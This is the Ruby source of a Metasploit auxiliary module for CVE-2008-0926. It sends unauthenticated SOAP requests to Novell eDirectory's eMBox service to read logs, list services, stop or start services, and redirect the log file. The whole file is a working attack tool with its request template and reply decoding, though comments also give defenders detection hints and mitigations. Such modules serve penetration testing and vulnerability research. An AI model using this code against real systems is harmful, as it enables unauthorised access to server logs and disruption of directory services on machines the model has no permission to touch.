rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
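# Auxiliary module for CVE-2008-0926: the eMBox SOAP endpoint of Novell
# eDirectory answers dispatch requests without authentication.
#
# Each action maps to one eMBox command ('CMD'). The reply is expected to carry
# a base64-encoded field, which is located with the action's 'PATTERN', decoded
# and printed.
#
# For defenders: every action is a single HTTP POST to /SOAP on the eMBox port
# (8028 by default) whose body is a SOAP <dispatch> element naming the command
# in <Action>, sent with a quoted, random upper-case SOAPAction header. The
# module declares IOC_IN_LOGS, so server-side logs are the first place to look.
# Limiting which hosts can reach the eMBox port and applying the vendor fix
# referenced by the CVE are the relevant mitigations.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata, the action table and the user options.
  #
  # Action option keys:
  #   'CMD'       - eMBox command placed in the SOAP <Action> element
  #   'PATTERN'   - regexp whose first capture holds the base64 reply payload
  #   'PARAM'     - XML <Parameters> template; __PARAM__ is replaced by the
  #                 PARAM datastore option
  #   'USE_PARAM' - whether the action requires the PARAM option
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
        'Description' => %q{
          This module will access Novell eDirectory's eMBox service and can run the
          following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
          STOP_SERVICE, START_SERVICE, SET_LOGFILE.
        },
        'References' => [
          [ 'CVE', '2008-0926' ],
          [ 'BID', '28441' ],
          [ 'OSVDB', '43690' ]
        ],
        'Author' => [
          'Nicob',
          'MC', # Initial Metasploit module
          'sinn3r'
        ],
        'License' => MSF_LICENSE,
        # NOTE(review): STOP_SERVICE / START_SERVICE change service state and
        # SET_LOGFILE changes logger configuration on the target. Confirm that
        # CRASH_SAFE + IOC_IN_LOGS alone describe that impact accurately.
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        },
        'Actions' => [
          [
            'GET_DN',
            {
              'Description' => 'Get DN',
              'CMD' => 'novell.embox.connmgr.serverinfo',
              'PATTERN' => %r{<ServerDN dt="Binary">(.*)</ServerDN>},
              'USE_PARAM' => false
            }
          ],
          [
            'READ_LOGS',
            {
              'Description' => 'Read all the log files',
              'CMD' => 'logger.readlog',
              'PATTERN' => %r{<LogFileData>(.*)</LogFileData>},
              'USE_PARAM' => false
            }
          ],
          [
            'LIST_SERVICES',
            {
              'Description' => 'List services',
              'CMD' => 'novell.embox.service.getServiceList',
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},
              'USE_PARAM' => false
            }
          ],
          [
            'STOP_SERVICE',
            {
              'Description' => 'Stop a service',
              'CMD' => 'novell.embox.service.stopService',
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},
              'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">' \
                         '<DSService:moduleName>__PARAM__</DSService:moduleName>' \
                         '</params></Parameters>',
              'USE_PARAM' => true
            }
          ],
          [
            'START_SERVICE',
            {
              'Description' => 'Start a service',
              'CMD' => 'novell.embox.service.startService',
              'PATTERN' => %r{<DSService:Message dt="Binary">(.*)</DSService:Message>},
              'PARAM' => '<Parameters>' \
                         '<params xmlns:DSService="service.dtd">' \
                         '<DSService:moduleName>__PARAM__</DSService:moduleName>' \
                         '</params></Parameters>',
              'USE_PARAM' => true
            }
          ],
          [
            'SET_LOGFILE',
            {
              'Description' => 'Read Log File',
              'CMD' => 'logger.setloginfo',
              'PATTERN' => %r{<Logger:Message dt="Binary">(.*)</Logger:Message>},
              'PARAM' => '<Parameters><params><logFile>__PARAM__</logFile>' \
                         '<logOptionAppend/></params></Parameters>',
              'USE_PARAM' => true
            }
          ]
        ],
        'DefaultAction' => 'LIST_SERVICES'
      )
    )

    register_options(
      [
        Opt::RPORT(8028),
        OptString.new('PARAM', [false, 'Specify a parameter for the action'])
      ]
    )
  end

  # Sends the selected action to the eMBox SOAP endpoint and prints the decoded
  # reply field.
  #
  # Prints an error and returns early when a required PARAM is missing, when
  # the server does not answer, or when the reply does not contain the field
  # the action's 'PATTERN' looks for.
  #
  # @return [void]
  def run
    if action.opts['USE_PARAM']
      value = datastore['PARAM'].to_s
      if value.empty?
        print_error("You must supply a parameter for action: #{action.name}")
        return
      end

      # Block form of gsub: a replacement *string* would have its backslash
      # sequences (\\, \0, \1 ...) interpreted, which corrupts values such as
      # Windows paths. The block's return value is inserted literally.
      # PARAM is placed into the XML verbatim (it is not XML-escaped).
      param = action.opts['PARAM'].gsub('__PARAM__') { value }
    else
      param = '<Parameters><params/></Parameters>'
    end

    template = %(<?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Header/>
    <SOAP-ENV:Body>
    <dispatch>
    <Action>#{action.opts['CMD']}</Action>
    <Object/>#{param}</dispatch>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>)

    # Collapse the literal above into a single line: drop the source
    # indentation, then the line breaks.
    template = template.gsub(/^ {4}/, '').delete("\n")

    begin
      connect
      print_status("Sending command: #{action.name}...")
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => '/SOAP',
        'data' => template + "\n\n",
        'headers' =>
          {
            'Content-Type' => 'text/xml',
            'SOAPAction' => %("#{Rex::Text.rand_text_alpha_upper(rand(1..25))}")
          }
      }, 25)

      if res.nil?
        print_error('Did not get a response from server')
        return
      end

      # First capture group of the first match, or nil when the reply does not
      # contain the expected element (patched server, error reply, other service).
      raw_data = res.body.to_s[action.opts['PATTERN'], 1]
      if raw_data.nil?
        print_error("Response (HTTP #{res.code}) did not contain the expected data for action: #{action.name}")
        return
      end

      print_line("\n" + Rex::Text.decode_base64(raw_data))
    ensure
      # Runs on every exit path, so the TCP socket opened by connect is not
      # left behind on the early returns above.
      disconnect
    end
  end
end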